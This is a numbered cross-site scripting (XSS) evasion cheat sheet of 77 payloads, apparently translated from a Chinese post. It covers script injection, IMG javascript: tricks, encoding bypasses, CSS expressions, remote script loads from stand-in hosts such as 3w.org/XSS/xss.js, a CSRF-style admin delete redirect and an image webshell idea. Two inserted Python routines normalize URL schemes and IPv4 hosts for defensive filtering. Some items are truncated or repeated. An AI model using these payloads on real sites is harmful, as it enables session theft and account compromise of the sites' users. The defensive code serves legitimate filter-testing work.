Cross-site image shell
XSS cross-site code: <script>alert("")</script>
Put the code on the first line of the webshell and change the webshell into JPG image format; when the image-format webshell is accessed, our shell is executed as well.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Fixing a flawed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically do not work domestically, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

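Items 3 through 19 and item 47 all defeat the same kind of filter: one that looks for the literal string javascript: while the browser tolerates mixed case, HTML character references with or without semicolons, and control or whitespace characters in front of and inside the scheme. The check below is an added example, not code from the original post, of the defensive counterpart: normalize the attribute value the same way before deciding whether its scheme is acceptable. It generalizes the character list in item 47 by dropping every Unicode control, format and separator character (categories C* and Z*); SAFE_SCHEMES is an assumed application policy and the samples are constructed from the vectors above.

```python
"""Conservative scheme check for URL-valued attributes (SRC, HREF, url() in CSS).

Added example, not code from the original post.  It undoes the obfuscations the
list above relies on (mixed case, HTML character references with or without
semicolons, embedded tab/newline/CR, NUL, leading spaces and the wide-space
characters of item 47) before asking which scheme the value really has.
"""
import html
import re
import unicodedata
from typing import Dict, Optional

# Assumed application policy: only these schemes may appear in src/href.
# Everything else (javascript:, vbscript:, data:, livescript:, ...) is rejected.
SAFE_SCHEMES = frozenset({"http", "https", "mailto"})

# RFC 3986 scheme syntax, matched only at the very start of the normalized value.
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def normalize_url_attr(value: str, max_decode_rounds: int = 3) -> str:
    """Reduce an attribute value to the form a scheme check should see.

    1. HTML-decode until stable (bounded), so &#106;avascript and
       jav&#x09;ascript collapse to plain characters.  Browsers decode once;
       decoding a few more times is a deliberately conservative choice.
    2. Drop every character in Unicode categories C* (controls, format
       characters such as U+FEFF) and Z* (space separators such as U+00A0,
       U+2000-U+200A, U+3000).  This covers the code points of item 47 and more.
    3. Lower-case, so JaVaScRiPt matches javascript.
    """
    decoded = value
    for _ in range(max_decode_rounds):
        again = html.unescape(decoded)
        if again == decoded:
            break
        decoded = again
    stripped = "".join(
        ch for ch in decoded if unicodedata.category(ch)[0] not in ("C", "Z")
    )
    return stripped.lower()


def url_scheme(value: str) -> Optional[str]:
    """Scheme of the normalized value, or None for relative / scheme-less URLs."""
    m = _SCHEME_RE.match(normalize_url_attr(value))
    return m.group(1) if m else None


def is_safe_url_attr(value: str) -> bool:
    """Allow scheme-less (relative) URLs and allowlisted schemes only."""
    scheme = url_scheme(value)
    return scheme is None or scheme in SAFE_SCHEMES


# Constructed samples: the first group mirrors the evasions in items 3-19 and 47,
# the second group is ordinary content that must keep working.
SAMPLES = [
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "jav&#x09;ascript:alert('XSS');",
    "jav\nascript:alert('XSS');",
    " javascript:alert('XSS');",
    "java\x00script:alert('XSS')",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)",
    "\u3000javascript:alert('XSS')",
    "vbscript:msgbox(\"XSS\")",
    "http://example.com/logo.png",
    "https://example.com/",
    "/images/logo.png",
    "a.php?a=b",
]


def classify(samples=SAMPLES) -> Dict[str, bool]:
    """Map each sample to the verdict of is_safe_url_attr."""
    return {s: is_safe_url_attr(s) for s in samples}


if __name__ == "__main__":
    for sample, ok in classify().items():
        verdict = "allow " if ok else "REJECT"
        print(f"{verdict}  scheme={url_scheme(sample)!r:<14} {sample!r}")
```

This only decides the scheme. A protocol-relative value such as //3w.org/XSS/xss.js (items 25 and 74) passes the scheme check and needs a separate host allowlist, and whatever passes must still be attribute-encoded when written into the page.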
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting the [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting the [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
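Items 70 through 76 show one host written in several notations that a URL parser treats as the same thing, so a link filter that compares raw host strings will block 192.168.0.1 and pass 3232235521. The code below is an added example, not part of the original post: it canonicalizes IPv4 literals the way a URL parser does (plain decimal, 0x hex, leading-zero octal, one to four dotted parts, tab/newline removed, trailing dot dropped) and only then compares the host with an allowlist. The ALLOWED set is constructed for the demonstration; the sample links are the ones from items 70 through 76.

```python
"""Canonicalize IPv4 host literals before comparing a link against an allowlist.

Added example, not code from the original post.  Items 70-76 write one host in
several spellings; a URL parser accepts all of them, so a filter must compare
canonical forms rather than raw strings.
"""
import re
from typing import Collection, Optional
from urllib.parse import urlsplit

# Digits permitted per radix.  Checking explicitly also rejects the '_' and '+'
# that Python's int() would otherwise silently accept.
_DIGITS = {
    10: re.compile(r"[0-9]+"),
    16: re.compile(r"[0-9a-fA-F]*"),
    8: re.compile(r"[0-7]*"),
}


def _ipv4_number(part: str) -> Optional[int]:
    """One dotted component: 0x-prefixed hex, leading-zero octal, otherwise decimal."""
    radix = 10
    if len(part) >= 2 and part[:2].lower() == "0x":
        part, radix = part[2:], 16          # a bare "0x" counts as 0
    elif len(part) >= 2 and part[0] == "0":
        part, radix = part[1:], 8
    if not _DIGITS[radix].fullmatch(part):
        return None
    return int(part, radix) if part else 0


def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad string if host is an IPv4 literal in any accepted notation, else None."""
    host = re.sub(r"[\t\n\r]", "", host)    # URL parsers drop these before host parsing
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                          # tolerate a trailing dot (item 76)
    if not 1 <= len(parts) <= 4:
        return None
    numbers = []
    for part in parts:
        n = _ipv4_number(part)
        if n is None:
            return None
        numbers.append(n)
    # All but the last part are single octets; the last part fills the remaining octets,
    # which is what makes the single number 3232235521 a valid address.
    if any(n > 255 for n in numbers[:-1]) or numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> Optional[str]:
    """Lower-cased host, trailing dot removed, IPv4 literals in dotted-quad form."""
    host = urlsplit(url).hostname            # None when the URL carries no authority
    if host is None:
        return None
    return canonical_ipv4(host) or host.rstrip(".")


def is_allowed_link(url: str, allowed_hosts: Collection[str]) -> bool:
    """Compare canonical hosts, so http://3232235521/ and http://192.168.0.1/ agree."""
    host = canonical_host(url)
    return host is not None and host in allowed_hosts


# Constructed allowlist for the demonstration.
ALLOWED = {"192.168.0.1", "www.google.com"}

if __name__ == "__main__":
    for link in (
        "http://3232235521", "http://0xc0.0xa8.0x00.0x01", "http://0300.0250.0000.0001",
        "//www.google.com/", "http://www.google.com./", "http://google.com/", "http://127.0.0.1/",
    ):
        print(f"{link:<32} -> {canonical_host(link)!s:<16} allowed={is_allowed_link(link, ALLOWED)}")
```

The mixed form of item 73 is handled by the tab/newline stripping in canonical_ipv4 rather than by urlsplit, because the page shows the characters inside the host itself; 6<TAB>6.000146.0x7.147 canonicalizes to 66.102.7.147. Relative links with no authority return None and are treated as not allowed, which is the safe default when the filter's job is to decide where a link may point.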